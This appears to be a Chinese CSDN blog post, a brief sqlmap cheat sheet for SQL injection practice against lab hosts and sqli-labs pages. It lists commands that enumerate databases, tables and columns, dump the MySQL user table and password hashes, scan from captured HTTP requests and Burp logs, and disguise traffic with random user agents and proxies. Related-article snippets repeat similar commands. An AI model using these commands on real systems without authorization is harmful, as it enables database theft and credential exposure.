sqlMap的简单使用

已于 2022-06-16 13:42:14 修改
阅读量396 收藏
点赞数
文章标签: 数据库 database
于 2022-06-05 15:28:13 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54472394/article/details/125131816
版权

文章目录

提示:

0 参数

--batch # 默认
--dbs  #爆出数据库
--tables #爆出 全部表
--columns # 爆出 全部 列的名字
--hostname  # 目标主机名字
--passwords # mysql密码
-u 单个查询  格式: 字符串 “url?id=1-m 多个查询  格式:  txt   “url?id=1”  
                          “url?id=1”
                          “url?id=1-r http 头部查询	  格式:  txt   记得用 【--level 5 】 (cookie,nc什么什么的)

一、单个、多个 url 查询

1.单个 -u

sqlmap -u "192.168.0.63/sqli/fei1/?id=1"

1.多个 -m

sqlmap -m feixiang.txt

feixiang.txt:

192.168.0.63/sqli/fei1/?id=1
192.168.0.63/sqli/fei2/?id=1
192.168.0.63/sqli/fei3/?id=1

2 自动爆 数据库名称+表名+列名

  1. 数据库名称: --dbs
  2. 表名 : --tables
  3. 列名: --columns

2.1 自动爆 一个数据库下面的表-列名 -D

sqlmap -u 'url?id=1' --dbs --tables --columns --dump  --batch

2.2 报一个表的字段

sqlmap -u "http://192.168.0.66/?id=1" --batch -D mysql -T user -C "User" --dump --threads 10

在这里插入图片描述

二 ,http 头部文件 扫描

sqlmap -r http.txt  --batch

http.txt:

GET /sqli/Less-20/index.php HTTP/1.1

Host: 192.168.0.63
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.63/sqli/Less-20/
Connection: close
Cookie: uname=admin
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

三 ,http bp日志扫描

  1. 使用bp抓包 保持访问过的 http头部文件
    在这里插入图片描述

sqlmap -l bp.txt --batch --dbs --level 5

-l :log http log 的意思
–level 5 : cookie 等http头部文件查询

3. 指定 http 里面 的 User-Agent

3.1 手动

sqlmap -u "url?id=1"  --user-agent="龙老板" --batch

3.1 自动

sqlmap -u "url?id=1"  --random-agent --batch

4.基于代理去跑 安全

sqlmap -u "url?id=1"  --proxy "http://192.168.0.111:10800(外网连接)" --delay="1"  --random-agent --batch

–delay # 1毫秒

兰兰不懒
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQLmap简单使用
11-03
SQLmap是一款用来检测与利用SQL注入漏洞的免费开源自动化工具,目前支持的数据库是MySQL、Oracle、PostgreSQL、SQL Server、Access、DB2、SQLite、Sybase等。没有图形化界面,通过...下面简单介绍一下sqlmap使用
sqlmap使用说明.pptx
04-02
介绍了 渗透测试工具 sqlmap使用方法。 对sqlmap -tamper 脚本的使用进行了演示。 burpsuite中sqlmap的插件进行了简单的介绍。
sqlmap学习(六)设置请求参数
rane的博客
03-26 751
1、sqlmap设置忽略401 --ignore-401参数用来忽略未验证错误 2、sqlmap设置HTTP协议私钥 当web服务器需要适当的客户端证书和用于身份验证的私钥时,使用此选项 --auth-file文件名 3、sqlmap设置安全模式 避免在多次请求失败后销毁会话 有时,如果执行了一定数量的不成功请求,则在此期间的web应用程序或检查技术会销毁会话。 有的web应用程序会在你多次访问错...
sqlmap常见参数使用
orTDS_security的博客
07-20 1606
## sqlmap的常见参数使用
SQLmap使用教程图文教程(非常详细)从零基础入门到精通,看完这一篇就够了。
最新发布
2401_84281629的博客
05-17 925
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
sqlmap工具使用
huangyongkang666的博客
03-21 3526
sqlmap工具使用 1.sqlmap介绍 SQLMAP是开源的自动化SQL注入工具,由Python写成,具有如下特点: 1、完全支持MySQL、Oracle、PostgreSQL、MSSQL、Access、IBM DB2、SQLite、Firebird、Sybase、SAP MaxDB、HSQLDB和Informix等多种数据库管理系统。 2、完全支持布尔型盲注、时间型盲注、基于错误信息的注入、联合查询注入和堆查询注入。 3、在数据库证书、IP地址、端口和数据库名等条件允许的情况下支持不通过SQL注入点而
sqlmap命令大全(附详细扫描流程)
m0_50818626的博客
05-24 7091
3.扫描指定数据库中的所有表名,-D可以指定要扫描的数据库,这里我扫的是security库。红框内就是我们所扫描出的字段名,一共有三个,分别为id,password,username。如上图所示,我们就把我们需要的username和password找出来啦!4.扫描users中的字段名是什么,-T可以指定扫描的表。上图红框内就是security库中的所有表啦。可以看到有漏洞,布尔盲注和时间盲注。可以看到所有的数据库都被扫描出来了。5.用dump扫描出字段中的所有数据。2.扫描所有数据库 -dbs。
sqlmap简单使用
qq_54037445的博客
11-30 951
sqlmap -u 注入点 #判断有无注入点sqlmap -u 注入点 --dbs #查看爆破数据库(不是某一个数据库,而是所有的数据库名)sqlmap -u 注入点 -D 库名 --tables #爆破指定数据库的表名sqlmap -u 注入点 -D 库名 -T 表名 --columns #爆破指定表的列名。
SQLmap使用手册1
08-03
在Ubuntu系统中,你可以通过终端使用`pip`来安装SQLmap。首先确保你的系统已经安装了Python和pip,然后执行以下命令: ```bash sudo apt-get update sudo apt-get install python3-pip pip3 install sqlmap ``` 这将...
sqlmap免安装
03-18
通过以上介绍,我们可以看到SQLMap免Python环境绿色版提供了一种简单快捷的方式来检测和利用SQL注入漏洞。了解其工作原理和使用方法,有助于提升网络安全防护能力,同时也为系统管理员提供了有效的漏洞检测工具。
sqlmap渗透工具
07-06
在Python环境中运行,SQLMap提供了一系列灵活且强大的选项,使得操作简单且高效。 SQLMap的工作原理基于输入数据与数据库查询结果之间的关系分析,通过注入不同的SQL片段来探测和利用潜在的注入漏洞。它支持多种...
新版sqlmap
04-10
自动化注入工具,支持如下数据库:MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB。
sqlmap命令详解
Pitbull2014的博客
12-20 1110
cookie注入:sqlmap.py -u 注入点 --cookie "参数" --tables --level 2 POST登录框注入:sqlmap.py -r 从文件读取数据 -p 指定的参数 --tables sqlmap.py -u 登录的地址 --forms 自动判断注入 sqlmap.py -u 登录的地址 --data "指定参数" 绕过waf防火墙:sq...
测试工具-sqlmap
weixin_42902126的博客
06-27 4260
sqlmap支持直连,通过以下命令来直连。 1、服务型数据库:mysql,oracle,sqlserver,postgresql等 服务型数据库(前提知道数据库用户名和密码): mysql数据库root账户默认不支持外链,参考文档:https://qa.1r1g.com/sf/ask/3435601921/ 2、文件型数据库:sqlite,access,firebird等 文件型数据库(前提知道数据库绝对路径): sqlmap获取目标 单一url探测 参数使用 -u 或 --url URL格式:http(s
对select的结果进行count统计
微电子学与固体电子学-俞驰
08-29 3301
统计某列中非Null数据,确保该列数据必定大于0的情况下 命令如下: select count(dist1) from merge.train where dist1 >-1
SQLmap 扫描工具的使用
m0_61990875的博客
10-21 2824
sqlmap使用方法
sqlmap学习及代码简析
04-05 3643
sqlmap 学习及代码简析
sqlmap简单使用
qq_44704184的博客
04-01 2894
以sqllabs靶场第二关为例 1、手工注入找注入点,发现参数id,上sqlmap 2、查询数据库 python sqlmap.py -u"http://localhost/sqli-labs-master/Less-2/index.php?id=1" --dbs 3、查询security数据库 python sqlmap.py -u"http://localhost/sqli-labs-master/Less-2/index.php?id=1" --tables -D security 4、查询u
sqlmap使用教程
09-13
关于sqlmap使用教程,以下是一些基本的指导步骤: 1. 安装sqlmap:你可以从sqlmap的官方网站(https://github.com/sqlmapproject/sqlmap)上下载最新版本的sqlmap。解压文件后,进入到sqlmap的目录。 2. 目标URL:确定你要测试的目标URL。这通常是一个包含参数的网页地址,它可能容易受到SQL注入攻击。 3. 检测漏洞:输入以下命令来检测目标URL是否存在SQL注入漏洞: ``` python sqlmap.py -u 目标URL ``` 4. 扫描选项:根据需要选择不同的扫描选项。例如,可以使用`--dbs`选项来获取目标数据库的名称,使用`--tables -D <数据库名>`选项来获取数据库中表的名称等等。 5. 数据库信息:使用`--current-db`选项来获取当前数据库的名称。使用`--users -D <数据库名>`选项来获取数据库中用户的信息。 6. 提取数据:使用`--dump -D <数据库名> -T <表名>`选项来提取指定数据库和表中的数据。你还可以使用其他选项来指定提取的列和过滤条件。 这只是一个简单的入门指南,sqlmap还有很多其他高级功能和选项。请记住,在进行任何安全测试之前,确保你已经获得相关授权,并且在合法和道德的框架内进行测试。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值